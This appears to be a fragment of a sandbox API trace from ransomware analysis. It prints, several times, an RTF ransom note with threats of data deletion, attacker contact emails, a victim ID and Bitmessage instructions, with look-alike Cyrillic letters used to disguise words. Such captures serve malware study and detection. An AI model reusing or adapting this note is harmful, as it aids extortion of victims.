\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.688] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.688] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 